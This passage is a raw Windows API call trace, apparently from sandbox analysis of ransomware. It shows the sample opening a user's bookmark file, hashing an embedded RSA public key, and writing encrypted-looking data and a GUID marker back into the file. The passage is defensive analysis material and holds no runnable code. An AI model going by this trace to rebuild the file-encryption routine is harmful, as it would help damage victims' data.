hHeap=0x6a0000) returned 1 [0189.014] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Links\\Web Slice Gallery.url") returned=".url" [0189.014] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.015] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=226) returned 1 [0189.015] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.017] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.017] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.018] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.018] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xe2, lpOverlapped=0x0) returned 1 [0189.018] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.019] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.019] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.019] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0189.020] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.020] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.020] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.020] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.020] GetLastError () returned 0x0 [0189.020] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.020] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0189.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.020] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.020] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.020] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe0) returned 0x2c70bc8 [0189.021] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38f88 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39898 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38fd0 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398b0 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398e0 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39940 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398f8 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.021] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0189.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0189.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39940 [0189.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0189.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398f8 [0189.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d398e0 [0189.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0189.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0189.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0189.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0189.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0189.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.025] GetCurrentThreadId () returned 0x264 [0189.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d43790 [0189.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0189.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.025] GetCurrentThreadId () returned 0x264 [0189.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0189.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.026] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0189.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39940 [0189.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398e0 [0189.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0189.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398f8 [0189.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398c8 [0189.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39958 [0189.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0189.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39928 [0189.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39910 [0189.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39970 [0189.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0189.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39910 [0189.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0189.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0189.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0189.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398e0 [0189.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0189.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0189.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0189.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0189.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0189.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38fd0 | out: hHeap=0x6a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.037] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb14*=0xdd, lpOverlapped=0x0) returned 1 [0189.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.037] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.037] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0189.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0189.039] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.039] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.039] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, 